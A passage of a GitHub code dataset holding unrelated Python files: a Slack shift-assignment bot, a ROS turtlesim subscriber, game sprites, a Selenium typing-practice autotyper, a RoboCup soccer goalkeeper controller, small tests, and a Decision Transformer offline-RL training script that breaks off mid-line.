.02)\"\"\"","repo_name":"johnwwalls/soil_moisture","sub_path":"get_time_series.py","file_name":"get_time_series.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15437655267","text":"from slackbot.bot import respond_to\nimport random\n\n@respond_to('shift (.*)')\ndef shift(message, args):\n    message.react('+1')\n\n    list = args.split()\n\n    # Validations\n    # Check the first argument\n    try:\n        num_of_groups = int(list[0])\n    except:\n        message.reply(f'第1引数<グループ数>には数値を入力してね!\\n\"{list[0]}\"はダメだよ!')\n        message.react('sweat')\n        return\n\n    members = list[1:] # list of member names\n    num_of_members = len(members)\n\n    # Check that the number of groups <= the number of members\n    if num_of_groups > num_of_members:\n        message.reply(f'<グループ数>がメンバー数よりも大きいのはだめだよ!うまく分けられないからね!')\n        message.react('sweat')\n        return\n    \n    message.send('シフトを振り分けるよ!')\n    random.shuffle(members) # shuffle the list in place\n    \n    num_of_members_per_group = int(num_of_members / num_of_groups) # members per group\n    rem = num_of_members % num_of_groups # remainder\n    start = 0\n    for group_num in range(num_of_groups):\n        end = start + num_of_members_per_group\n        if rem > 0:\n            end += 1\n            rem -= 1\n        members_by_group = members[start:end]\n        \n        msg = '```'\n        msg += f'【グループ{group_num+1}】\\n'\n        for member in members_by_group:\n            msg += f'・{member}\\n'\n        msg += '```'\n\n        message.send(msg)\n\n        start = end\n\n    message.reply('シフト振り分け終わったよ!')\n\n\n@respond_to('ありがとう')\ndef thanks(message):\n    
message.react('smile')","repo_name":"konekato/my-slack-bot","sub_path":"plugins/shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19491576891","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom turtlesim.msg import Pose\n#from std_msgs.msg import Float32\nfrom turtlesim_helper.msg import UnitsLabelled\nimport math\n\n\nclass check_sub:\n def __init__(self):\n self.total = 0\n self.Xold = 0\n self.Yold = 0\n self.pub_msg = UnitsLabelled()\n self.pub_msg.units = \"meters\"\n rospy.Subscriber(\"/turtle1/pose\", Pose, self.callback)\n #self.pub_raw=rospy.Publisher(\"output1\",Float32, queue_size=10)\n self.pub_units = rospy.Publisher(\"output1\", UnitsLabelled, queue_size=10)\n self.pub_units.publish(self.pub_msg)\n \n\n def callback(self,msg):\n\n self.total += math.sqrt(pow(msg.x-self.Xold,2)+pow(msg.y-self.Yold,2))\n self.Xold = msg.x\n self.Yold = msg.y\n self.pub_msg.value = self.total\n #self.pub_raw.publish(self.total)\n self.pub_units.publish(self.pub_msg)\n\n\n\nif __name__=='__main__':\n rospy.init_node('check_sub')\n check_sub()\n rospy.spin()\n\n","repo_name":"mdsaifk123/mohammed","sub_path":"packages/homework2_ros/src/check_sub.py","file_name":"check_sub.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35160205409","text":"import arcade\n\nclass Explosao(arcade.Sprite):\n\n def __init__(self,texture_list,img,escala,center_x,center_y,angulo):\n imagem_inicial = img \n super().__init__(filename=imagem_inicial,scale=escala,center_x=center_x,center_y=center_y)\n self.current_texture = 0\n self.textures = texture_list\n self._angle = angulo\n self.tamanho_lista = len(self.textures)\n self.timer = 0\n self.tamanho = 32\n self.escala = escala\n\n def update(self,delta_time):\n self.timer += delta_time\n if self.timer >= 0.04:\n self.current_texture += 1\n if self.current_texture < self.tamanho_lista:\n self.set_texture(self.current_texture)\n else:\n self.kill()\n self.timer = 0\n\nclass Explosao_central(Explosao):\n def __init__(self,texture_list,img=\"img/explosao/explosao_central1.png\",escala=0.66,center_x=0,center_y=0,angulo=0):\n super().__init__(texture_list,img,escala,center_x,center_y,angulo)\n\nclass Explosao_trilho(Explosao):\n def __init__(self,texture_list,img=\"img/explosao/explosao_trilho1.png\",escala=0.66,center_x=0,center_y=0,angulo=0):\n super().__init__(texture_list,img,escala,center_x,center_y,angulo)\n\nclass Explosao_fim(Explosao):\n def __init__(self,texture_list,img=\"img/explosao/explosao_fim1.png\",escala=0.66,center_x=0,center_y=0,angulo=0):\n super().__init__(texture_list,img,escala,center_x,center_y,angulo)\n","repo_name":"vitorueno/BombAnimal","sub_path":"app/bombas/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36464847424","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nwith webdriver.Chrome() as driver:\r\n driver.get('https://manabi-gakushu.benesse.ne.jp/gakushu/typing/homeposition.html')\r\n #driver.get('https://manabi-gakushu.benesse.ne.jp/gakushu/typing/nihongonyuryoku.html')\r\n #driver.get('https://manabi-gakushu.benesse.ne.jp/gakushu/typing/eigonyuryoku.html')\r\n 
\r\n #time.sleep(1)\r\n \r\n elem = driver.find_element(By.ID, \"goSettingButton\")\r\n elem.click()\r\n elem = driver.find_element(By.ID, \"timeLimitButton\")\r\n elem.click()\r\n #time.sleep(1)\r\n elem.send_keys(Keys.LEFT)\r\n #time.sleep(1)\r\n elem.send_keys(Keys.LEFT)\r\n #time.sleep(1)\r\n elem = driver.find_element(By.CLASS_NAME, \"typingButton\")\r\n elem.click()\r\n\r\n #time.sleep(1)\r\n body_element = driver.find_element(By.TAG_NAME, 'body')\r\n body_element.send_keys(Keys.SPACE)\r\n\r\n time.sleep(3)\r\n\r\n while True:\r\n sentence = driver.find_element(By.ID, \"remaining\").text\r\n print(sentence)\r\n for key in(sentence):\r\n body_element.send_keys(key)\r\n time.sleep(0.05)","repo_name":"masaki1327/Typing-Automation","sub_path":"Typing_Automation.py","file_name":"Typing_Automation.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24173715473","text":"import unified_planning\nfrom unified_planning.shortcuts import *\nfrom unified_planning.test import TestCase\nfrom unified_planning.test.examples import get_example_problems\nfrom unified_planning.transformers.transformer import Transformer\n\nclass TestQuantifiersRemover(TestCase):\n def setUp(self):\n TestCase.setUp(self)\n self.problems = get_example_problems()\n\n def test_transformer(self):\n problem = self.problems['basic'].problem\n a = problem.action('a')\n t = Transformer(problem, 't')\n t._new_problem = problem\n with self.assertRaises(NotImplementedError):\n t.get_rewritten_problem()\n with self.assertRaises(NotImplementedError):\n t.rewrite_back_plan(None)\n","repo_name":"karpase/unified-planning","sub_path":"unified_planning/test/test_transformer.py","file_name":"test_transformer.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"24674319094","text":"# rcj_soccer_player controller - ROBOT B1\n\n# Griffins - Goalkeeper\n\nimport math\nimport time\n\nfrom rcj_soccer_robot import RCJSoccerRobot, TIME_STEP\nfrom Mathematics.Mathematics import Clamp\nfrom Mathematics.Vector2 import Vector2\nimport utils\n\nclass MyRobot1(RCJSoccerRobot):\n def __init__(self, robot):\n super().__init__(robot)\n\n self.position: Vector2 = Vector2.zero\n self.rotation: float = 0\n\n self.ballPosition: Vector2 = Vector2.zero\n self.prevBallPosition: Vector2 = Vector2.zero\n\n GK_BLUE_SPOT: Vector2 = Vector2(0.0, 0.5)\n GK_YELLOW_SPOT: Vector2 = Vector2(0.0, -0.5)\n\n self.attackSpot: Vector2\n self.polarity = 0\n if self.name.startswith('B'):\n self.attackSpot = GK_BLUE_SPOT\n self.polarity = 1\n if self.name.startswith('Y'):\n self.attackSpot = GK_YELLOW_SPOT\n self.polarity = -1\n\n\n def run(self):\n while self.robot.step(TIME_STEP) != -1:\n # Update game data\n self.position = self.get_gps_coordinates()\n self.rotation = self.get_compass_heading()\n\n teamData = []\n\n while self.is_new_team_data():\n teamData.append(self.get_new_team_data())\n\n ballData = {}\n if self.is_new_ball_data():\n ballData = self.get_new_ball_data()\n localBallPosition = utils.ball_position(ballData, self.position, self.rotation)\n\n \n self.ballPosition = utils.avg_ball_position(ballData, self.position, self.rotation, teamData)\n self.send_data_to_team(\n self.player_id,\n self.position,\n utils.ball_position(ballData, self.position, self.rotation)\n )\n\n if self.ballPosition.x == -100:\n self.ballPosition = self.prevBallPosition\n\n self.prevBallPosition = 
self.ballPosition\n\n ballYDelta = (self.attackSpot.y * self.polarity) - (self.ballPosition.y * self.polarity)\n\n if ballYDelta > 0:\n # The ball is in front of the goalkeeper \n \n if ballYDelta < 0.6:\n if self.position.y < self.attackSpot.y + 0.09 and self.position.y > self.attackSpot.y - 0.09:\n if self.rotation < math.radians(345) and self.rotation > math.radians(15):\n self.RotateTo(math.radians(0), 5)\n else:\n if self.position.y < self.attackSpot.y + 0.07 and self.position.y > self.attackSpot.y - 0.07 and self.RotateTo(math.radians(0), 5):\n pass\n else:\n if self.position.x < self.ballPosition.x:\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(-10, -10 + (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(-10 + (abs(self.position.y - self.attackSpot.y)) * 20, -10)\n else:\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(10, 10 - (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(10 - (abs(self.position.y - self.attackSpot.y)) * 20, 10)\n else:\n self.GoToPosition(Vector2(self.position.x, self.attackSpot.y), 10)\n\n else:\n if self.position.y < self.attackSpot.y + 0.09 and self.position.y > self.attackSpot.y - 0.09:\n if self.rotation < math.radians(345) and self.rotation > math.radians(15):\n self.RotateTo(math.radians(0), 5)\n else:\n if self.position.y < self.attackSpot.y + 0.07 and self.position.y > self.attackSpot.y - 0.07 and self.RotateTo(math.radians(0), 5):\n pass\n else:\n if self.position.x < Clamp(self.ballPosition.x, -0.35, 0.35) :\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(-10, -10 + (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(-10 + (abs(self.position.y - self.attackSpot.y)) * 20, -10)\n else:\n if self.position.y < self.attackSpot.y:\n self.SetMotorVelocity(10, 10 - (abs(self.position.y - self.attackSpot.y)) * 20)\n else:\n self.SetMotorVelocity(10 - (abs(self.position.y - self.attackSpot.y)) * 20, 10)\n else:\n self.GoToPosition(Vector2(self.position.x, self.attackSpot.y), 10)\n else:\n # The ball is behind the goalkeeper\n self.GoToPosition(Vector2(self.ballPosition.x, 0.7 * self.polarity), 10)\n\n\n def Rotate(self, speed):\n # Reversed Positive numbers to be clockwise\n self.SetMotorVelocity(speed, -speed)\n\n def StopMotors(self):\n self.SetMotorVelocity(0, 0)\n\n def RotateTo(self, angle, speed) -> bool:\n # This function should be call in a loop\n # Returns True while rotating\n\n angleDifference = abs(math.degrees(self.rotation) - angle)\n\n if not (angleDifference >= 345 or angleDifference <= 15):\n if math.degrees(self.rotation) < angle:\n if abs(math.degrees(self.rotation) - angle) <= 180:\n self.Rotate(speed)\n else:\n self.Rotate(-speed)\n else:\n if abs(math.degrees(self.rotation) - angle) <= 180:\n self.Rotate(-speed)\n else:\n self.Rotate(speed)\n return True\n else:\n self.StopMotors()\n return False\n\n def GoToPosition(self, position: Vector2, speed) -> bool:\n # This function should be call in a loop\n # Returns True while moving\n\n positionDifference = self.position - position\n angle = math.degrees((self.position - position).GetAngle())\n\n if abs(positionDifference.x) >= 0.02 or abs(positionDifference.y) >= 0.02:\n if not (self.RotateTo(angle, speed)):\n self.GoForward(speed)\n return True\n else:\n self.StopMotors()\n return False\n\n def SetMotorVelocity(self, leftMotor: float, rightMotor: float):\n # Reverse Forward to be positive numbers\n self.left_motor.setVelocity(-leftMotor)\n 
self.right_motor.setVelocity(-rightMotor)\n\n def GoForward(self, speed):\n self.SetMotorVelocity(speed, speed)\n\n\"\"\"\nimport math\n\nimport utils\nfrom rcj_soccer_robot import RCJSoccerRobot, TIME_STEP\nfrom Mathematics.Vector2 import *\n\nGOALKEEPER_SPOT: Vector2 = Vector2(0, 0.5)\n\nclass MyRobot1(RCJSoccerRobot): \n def run(self):\n # START\n\n # UPDATE\n while self.robot.step(TIME_STEP) != -1:\n if self.is_new_data():\n if self.is_new_ball_data():\n ball_data = self.get_new_ball_data()\n ball_direction = Vector2(ball_data[\"direction\"][0], ball_data[\"direction\"][1])\n ball_angle = angle_between_vectors(Vector2.north, ball_direction)\n\n #print(math.sqrt(1 / ball_data[\"strength\"]))\n\n heading = self.get_compass_heading()\n\n angle = math.degrees(heading) + 270\n\n robot_data = self.get_gps_coordinates()\n robot_position: Vector2 = Vector2(robot_data[0], robot_data[1])\n robot_rotation = (math.degrees(heading) + 270) % 360\n\n\n\n goalkeeper_spot_angle = (angle_between_vectors(Vector2.north, (robot_position - GOALKEEPER_SPOT).Normalized()) + robot_rotation) % 360\n #print(goalkeeper_spot_angle)\n #print(utils.ball_position(ball_data, robot_data, heading)) \n #print(angle)\n\n print(math.degrees(heading))\n\n\n \n\ndef get_direction(ball_angle: float) -> int:\n if ball_angle >= 345 or ball_angle <= 15:\n return 0\n return -1 if ball_angle < 180 else 1\n\ndef angle_between_vectors(vector1: Vector2, vector2: Vector2) -> float:\n return (math.degrees(math.atan2(vector1.y, vector1.x)) - math.degrees(math.atan2(vector2.y, vector2.x)) + 360) % 360\n\n\n\n\n\n\n\n\n\n\n\n def run(self):\n timer: utils.Timer = utils.Timer()\n\n #self.left_motor.setVelocity(7.068)\n #self.right_motor.setVelocity(-7.068)\n\n # Update\n while self.robot.step(TIME_STEP) != -1:\n if self.is_new_data():\n \n # TODO: Get and do something with supervisor data\n #data = self.get_new_data()\n\n #while self.is_new_team_data():\n #team_data = self.get_new_team_data() # noqa: F841\n # Do something with team data\n\n\n # Get ball data\n if self.is_new_ball_data():\n ball_data = self.get_new_ball_data()\n else:\n # If the robot does not see the ball, stop motors\n print(\"Robot does not see the ball\")\n self.left_motor.setVelocity(0)\n self.right_motor.setVelocity(0)\n continue\n\n # Get data from compass\n heading = self.get_compass_heading() # noqa: F841\n\n # Get GPS coordinates of the robot\n robot_pos = self.get_gps_coordinates() # noqa: F841\n \n # Get data from sonars\n #sonar_values = self.get_sonar_values() # noqa: F841\n\n\n #print(math.degrees(math.atan(ball_data[\"direction\"][1] / ball_data[\"direction\"][0])))\n # print(ball_data[\"direction\"])\n\n angle = math.degrees(heading) + 270\n\n if angle > 360:\n angle -= 360\n\n # Set the speed to motors\n\n ballAngle = math.degrees(math.atan2(0, 1)) - math.degrees(math.atan2(ball_data[\"direction\"][1], ball_data[\"direction\"][0]))\n\n if ballAngle < 0:\n ballAngle += 360\n\n ballAngle += 360 - angle\n\n if ballAngle > 360:\n ballAngle -= 360\n\n ballAngle = 360 - ballAngle\n\n #print(1 / math.sqrt(ball_data[\"strength\"]))\n #print(angle)\n\n if angle > 85 and angle < 95:\n print(timer.GetTime())\n self.left_motor.setVelocity(0)\n self.right_motor.setVelocity(0)\n return\n\n elif timer.GetTime() > 4:\n self.left_motor.setVelocity(2.5)\n self.right_motor.setVelocity(2.5)\n\n\n # Send message to team robots\n self.send_data_to_team(self.player_id)\n \"\"\"\n 
","repo_name":"robocup-junior/rcj-2022-soccersim-code","sub_path":"004/rcj_soccer_team_blue/robot1.py","file_name":"robot1.py","file_ext":"py","file_size_in_byte":11544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24971453743","text":"import json\nfrom pyassert import *\n\nfrom utils.http_manager import HttpManager\n\n\nclass PatchTests:\n\n def test_partial_update_booking(self, existing_booking_url, test_data):\n \"\"\"\n Checks whether partial update properly updates booking data\n \"\"\"\n data = test_data('test_data/partial_update_booking.json')\n response = HttpManager.patch(existing_booking_url, data=data)\n assert_that(response.status_code).is_equal_to(200)\n assert_that(response.json()['firstname']).is_equal_to(json.loads(data)['firstname'])\n assert_that(response.json()['lastname']).is_equal_to(json.loads(data)['lastname'])\n ","repo_name":"olakowalczyk/PythonAPIAutomationTesting","sub_path":"tests/test_PartialUpdateBooking.py","file_name":"test_PartialUpdateBooking.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13483348813","text":"import gzip\n\nfrom stream.functions.bytes import un_gzip\nfrom stream.io.local import LocalFile\n\n\ndef test_un_gzip(tmpdir):\n file = str(tmpdir / '0.txt.gz')\n with gzip.open(file, mode='wb') as f:\n f.write(b\"\"\"#123\n\n456\n\"\"\")\n\n assert tuple(\n LocalFile(file, mode='rb').stream\n | un_gzip\n ) == (\n b'#123\\n',\n b'\\n',\n b'456\\n',\n )\n","repo_name":"MichaelKim0407/python-stream","sub_path":"tests/functions/test_unzip.py","file_name":"test_unzip.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"29183883452","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\n\n\"\"\"Main entry point for Decision Transformer\"\"\"\nimport gym\nimport numpy as np\nimport torch\n\n# Tensorboard\nfrom tensorboardX import SummaryWriter\n\n# read the offline .pkl dataset\nimport pickle\nimport random\nimport sys\n\n# DT\nfrom model import DecisionTransformer\nfrom train import SequenceTrainer\nfrom eval import evaluate_episode_rtg\n\n# %BC (behavior cloning)\nfrom model import MLPBCModel\nfrom train import ActTrainer\nfrom eval import evaluate_episode\n\nfrom utils import discount_cumsum,model_save,load_model\n\nimport datetime\n\n# Parameters - Decision-Transformer for Mujoco Gym\nclass Config:\n    env = \"hopper\"\n    dataset = \"medium\"\n    mode = \"normal\" # \"delayed\" : all rewards moved to end of trajectory\n    device = 'cuda'\n    log_dir = 'TB_log/'\n    record_algo = 'DT_Hopper_v1'\n    test_cycles = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n\n    # Model\n    model_type = \"DT\"\n    activation_function = 'relu'\n\n    # Scalar\n    max_length = 20 # max_len # K\n    pct_traj = 1.\n    batch_size = 64\n    embed_dim = 128\n    n_layer = 3\n    n_head = 1\n    dropout = 0.1\n    lr = 1e-4\n    wd = 1e-4\n    # warmup_steps = 1000\n    warmup_steps=10\n    # num_eval_episodes = 100\n    num_eval_episodes = 10\n    max_iters = 50\n    # num_steps_per_iter = 1000\n    num_steps_per_iter = 10\n\n    # Bool\n    log_to_tb = True\n\ndef main_dt(args=Config()):\n\n    device = args.device\n    if args.log_to_tb:\n        writer = SummaryWriter(logdir=args.log_dir + args.record_algo + '_'+args.test_cycles)\n        print(\"建立TB文件夹结束\")\n\n    env_name = args.env\n    dataset = args.dataset\n\n    dataset_path = f'{env_name}-{dataset}-v2.pkl'\n    print(\"===== Dataset Path: {} =====\".format(dataset_path))\n\n    # use Hopper as the test benchmark\n    if env_name == \"hopper\":\n        env = gym.make(\"Hopper-v3\")\n        print(\"成功装载环境!\")\n        state_dim = env.observation_space.shape[0]\n        action_dim = env.action_space.shape[0]\n        print(\"Observation Space:\", env.observation_space, \"|| Dims: \", state_dim)\n        print(\"Action Space:\",env.action_space, \"|| Dims: \", action_dim)\n        max_ep_len = 1000\n\n        env_targets = [3600, 1800] # preset target return values\n\n        print(env_targets[:1])\n        scale = 1000. # return scale coeff.\n    else:\n        raise NotImplementedError\n\n    # if args.model_type == 'BC': # behavior cloning model\n    env_targets = env_targets[:1] # since BC ignores target, no need for different evaluations\n\n    # load the dataset\n    with open(dataset_path, 'rb') as f:\n        trajectories = pickle.load(f)\n    print(\"数据读取完毕... ...\")\n\n    # store each path's info in the corresponding lists\n    mode = args.mode\n    states, traj_lens, returns = [], [], []\n    for path in trajectories:\n        if mode == 'delayed': # here the return is moved to the end of the trajectory\n            \"\"\"The delayed variant evaluates the algorithm under sparse rewards:\n            there is no reward signal early on; only one overall reward is received at the very end.
\n            \"\"\"\n            path['rewards'][-1] = path['rewards'].sum()\n            path['rewards'][:-1] = 0.\n\n        states.append(path['observations']) # path['obs'] Dim: (XXX, state_dim) XXX: traj_len (timesteps per trajectory)\n        traj_lens.append(len(path['observations'])) # path['rw'] Dim: (XXX, )\n        returns.append(path['rewards'].sum()) # Returns: cumulative reward ---- the return\n\n    # Traj Lens Dims: (2186, )\n    # Returns Lens Dims: (2186,)\n    # Max return: 3222.36\n    # Min return: 315.87\n    traj_lens, returns = np.array(traj_lens), np.array(returns)\n\n    # input normalization (state)\n    states = np.concatenate(states, axis=0)\n    state_mean, state_std = np.mean(states, axis=0), np.std(states, axis=0) + 1e-6\n\n    # num_timesteps: total number of timesteps across all paths\n    num_timesteps = sum(traj_lens)\n\n    print('=' * 50)\n    print(f'Starting new experiment: {env_name} {dataset}')\n    print(f'{len(traj_lens)} trajectories, {num_timesteps} timesteps found')\n    print(f'Average return: {np.mean(returns):.2f}, std: {np.std(returns):.2f}')\n    print(f'Max return: {np.max(returns):.2f}, min: {np.min(returns):.2f}')\n    print('=' * 50)\n\n    K = args.max_length\n    batch_size = args.batch_size\n    num_eval_episodes = args.num_eval_episodes\n    pct_traj = args.pct_traj\n\n    # for behavior cloning, train only on the top pct_traj trajectories (For %BC Experiment)\n    num_timesteps = max(int(pct_traj*num_timesteps), 1)\n    sorted_inds = np.argsort(returns) # sorted low-to-high\n    num_trajectories = 1\n    # timesteps of the highest-return trajectory\n    timesteps = traj_lens[sorted_inds[-1]]\n    ind = len(trajectories) - 2\n    while ind >= 0 and timesteps + traj_lens[sorted_inds[ind]] < num_timesteps:\n        timesteps += traj_lens[sorted_inds[ind]]\n        num_trajectories += 1\n        ind -= 1 # walk returns from high to low\n\n    # the result is the index list with the lowest returns excluded\n    sorted_inds = sorted_inds[-num_trajectories:]\n\n    # Reweight Sampling\n    # sample trajectories weighted by their relative timestep counts\n    p_sample = traj_lens[sorted_inds] / sum(traj_lens[sorted_inds])\n\n    def get_batch(batch_size=256, max_len=K):\n        batch_inds = np.random.choice(\n            np.arange(num_trajectories),\n            size = batch_size,\n            replace = True,\n            p = p_sample, # sample according to timestep counts\n        )\n\n        s, a, r, d, rtg, timesteps, mask = [], [], [], [], [], [], []\n        for i in range(batch_size):\n            traj = trajectories[int(sorted_inds[batch_inds[i]])]\n\n            si = random.randint(0,traj['rewards'].shape[0] - 1) # sampling start position\n\n            # debug\n            # print(\"Start sampling position: \", si)\n\n            # get sequences from dataset\n            # s\n            # print(traj['observations'][si:si + max_len].reshape(1, -1, state_dim).shape) # shape: 1, 20, 11\n            s.append(traj['observations'][si:si + max_len].reshape(1, -1, state_dim)) # 1, XXX ,state_dim\n\n            # a\n            # print(traj['actions'][si:si + max_len].reshape(1, -1, action_dim).shape) # 1, 20, 3\n            a.append(traj['actions'][si:si + max_len].reshape(1, -1, action_dim))\n\n            # r\n            r.append(traj['rewards'][si:si + max_len].reshape(1, -1, 1)) # append(Dims: 1,20, 1)\n            if 'terminals' in traj:\n                d.append(traj['terminals'][si:si + max_len].reshape(1, -1))\n            else:\n                d.append(traj['dones'][si:si + max_len].reshape(1, -1))\n\n            # timesteps\n            timesteps.append(np.arange(si, si + s[-1].shape[1]).reshape(1, -1)) # Append Dim: (1,20,1)\n            # clip any timestep index >= max_ep_len (max_ep_len=1000) down to max_ep_len-1\n            timesteps[-1][timesteps[-1] >= max_ep_len] = max_ep_len-1 # padding cutoff\n            # Return-to-go\n            ret = discount_cumsum(traj['rewards'][si:],gamma=1.)\n            # ret = ret[:s[-1].shape[1]+1].reshape(1,-1,1)\n            ret = ret[:s[-1].shape[1]].reshape(1, -1, 1)\n            rtg.append(ret) # Append(1,21,1) since 21 > max_len\n\n            if rtg[-1].shape[1] <= s[-1].shape[1]: # 21 & 20\n                rtg[-1] = np.concatenate([rtg[-1], np.zeros((1, 1, 1))], axis=1)\n\n            # padding and state + reward normalization\n            tlen 
= s[-1].shape[1]\n # print(\"timestep len: \", tlen) # 20\n s[-1] = np.concatenate([np.zeros((1, max_len - tlen, state_dim)), s[-1]], axis=1)\n s[-1] = (s[-1] - state_mean) / state_std\n a[-1] = np.concatenate([np.ones((1, max_len - tlen, action_dim)) * -10., a[-1]], axis=1)\n r[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), r[-1]], axis=1)\n d[-1] = np.concatenate([np.ones((1, max_len - tlen)) * 2, d[-1]], axis=1)\n rtg[-1] = np.concatenate([np.zeros((1, max_len - tlen, 1)), rtg[-1]], axis=1) / scale\n # print(\"Return-to-go:\",rtg[-1].shape)\n\n timesteps[-1] = np.concatenate([np.zeros((1, max_len - tlen)), timesteps[-1]], axis=1)\n\n mask.append(np.concatenate([np.zeros((1, max_len - tlen)), np.ones((1, tlen))], axis=1))\n\n s = torch.from_numpy(np.concatenate(s, axis=0)).to(dtype=torch.float32, device=device)\n a = torch.from_numpy(np.concatenate(a, axis=0)).to(dtype=torch.float32, device=device)\n r = torch.from_numpy(np.concatenate(r, axis=0)).to(dtype=torch.float32, device=device)\n d = torch.from_numpy(np.concatenate(d, axis=0)).to(dtype=torch.long, device=device)\n rtg = torch.from_numpy(np.concatenate(rtg, axis=0)).to(dtype=torch.float32, device=device)\n timesteps = torch.from_numpy(np.concatenate(timesteps, axis=0)).to(dtype=torch.long, device=device)\n mask = torch.from_numpy(np.concatenate(mask, axis=0)).to(device=device)\n\n # debug\n # print(\"=\"*40)\n # print(\"Dim s:\", s.shape) # BS,20(max_len),1\n # print(\"Dim a:\", a.shape)\n # print(\"Dim r:\", r.shape)\n # print(\"Dim d:\", d.shape)\n # print(\"Dim rtg:\", rtg.shape) # BS,21(max_len+1),1\n # print(\"Dim timesteps:\", timesteps.shape)\n # print(\"Dim mask:\", mask.shape)\n # print(\"=\" * 40)\n\n return s,a,r,d,rtg,timesteps,mask\n\n def eval_episodes(target_rew,log_tb=args.log_to_tb):\n def fn(model,log_tb=log_tb):\n returns, lengths = [], []\n for _ in range(num_eval_episodes):\n with torch.no_grad():\n if args.model_type == 'DT':\n ret, length = evaluate_episode_rtg(\n env,\n state_dim,\n action_dim,\n model,\n max_ep_len=max_ep_len,\n scale=scale,\n target_return=target_rew/scale,\n mode=mode,\n state_mean=state_mean,\n state_std=state_std,\n device=device,\n )\n else:\n ret, length = evaluate_episode(\n env,\n state_dim,\n action_dim,\n model,\n max_ep_len=max_ep_len,\n target_return=target_rew/scale,\n mode=mode,\n state_mean=state_mean,\n state_std=state_std,\n device=device,\n )\n returns.append(ret)\n lengths.append(length)\n\n mean_returns = np.mean(returns)\n mean_tplen = np.mean(lengths)\n\n if log_tb:\n return {\n f'target_{target_rew}_return_mean': np.mean(returns),\n f'target_{target_rew}_return_std': np.std(returns),\n f'target_{target_rew}_length_mean': np.mean(lengths),\n f'target_{target_rew}_length_std': np.std(lengths),\n }, mean_tplen, mean_returns\n else:\n return {\n f'target_{target_rew}_return_mean': np.mean(returns),\n f'target_{target_rew}_return_std': np.std(returns),\n f'target_{target_rew}_length_mean': np.mean(lengths),\n f'target_{target_rew}_length_std': np.std(lengths),\n }\n\n return fn\n\n if args.model_type == 'DT':\n model = DecisionTransformer(\n state_dim=state_dim,\n act_dim=action_dim,\n max_length=K,\n max_ep_len=max_ep_len,\n hidden_size=args.embed_dim,\n n_layer=args.n_layer,\n n_head=args.n_head,\n n_inner=4*args.embed_dim,\n activation_function=args.activation_function,\n n_positions=1024,\n resid_pdrop=args.dropout,\n attn_pdrop=args.dropout,\n )\n elif args.model_type == 'BC':\n model = MLPBCModel(\n state_dim=state_dim,\n act_dim=action_dim,\n 
max_length=K,\n            hidden_size=args.embed_dim,\n            n_layer=args.n_layer,\n        )\n    else:\n        raise NotImplementedError\n\n    # To Cuda\n    model = model.to(device)\n\n    # Warmup stage\n    warmup_steps = args.warmup_steps\n\n    # Optim\n    optimizer = torch.optim.Adam(\n        model.parameters(),\n        lr=args.lr,\n        weight_decay=args.wd,\n    )\n\n    # learning-rate scheduler\n    scheduler = torch.optim.lr_scheduler.LambdaLR(\n        optimizer,\n        lambda steps: min((steps+1)/warmup_steps, 1)\n    )\n\n    # Trainer selection\n    if args.model_type == 'DT':\n        trainer = SequenceTrainer(\n            model = model,\n            optimizer = optimizer,\n            batch_size = batch_size,\n            get_batch = get_batch,\n            scheduler = scheduler,\n            loss_fn = lambda s_hat, a_hat, r_hat, s, a, r: torch.mean((a_hat - a)**2),\n            # eval target: the first desired return-to-go\n            eval_fns=[eval_episodes(tar) for tar in env_targets],\n        )\n\n    elif args.model_type == 'BC':\n        trainer = ActTrainer(\n            model=model,\n            optimizer=optimizer,\n            batch_size=batch_size,\n            get_batch=get_batch,\n            scheduler=scheduler,\n            loss_fn=lambda s_hat, a_hat, r_hat, s, a, r: torch.mean((a_hat - a)**2),\n            eval_fns=[eval_episodes(tar) for tar in env_targets],\n        )\n\n    for iter in range(args.max_iters):\n        if args.log_to_tb:\n            output,mean_ret,mean_len = trainer.train_iteration(\n                num_steps = args.num_steps_per_iter,\n                iter_num = iter+1,\n                print_logs = True,\n                TB_log = args.log_to_tb\n            )\n            # tb writer\n            writer.add_scalar(tag='DT/mean_return',global_step=iter,scalar_value=mean_ret)\n            writer.add_scalar(tag='DT/mean_len', global_step=iter, scalar_value=mean_len)\n            writer.add_scalar(tag='DT/mean_mse_a',global_step=iter, scalar_value=output['training/train_loss_mean'])\n            writer.add_scalar(tag='DT/std_mse_a', global_step=iter, scalar_value=output['training/train_loss_std'])\n            # print(\"成功写入!\")\n\n            model_save(args.record_algo+args.test_cycles,model)\n\n\n        else:\n            output = trainer.train_iteration(\n                num_steps = args.num_steps_per_iter,\n                iter_num = iter+1,\n                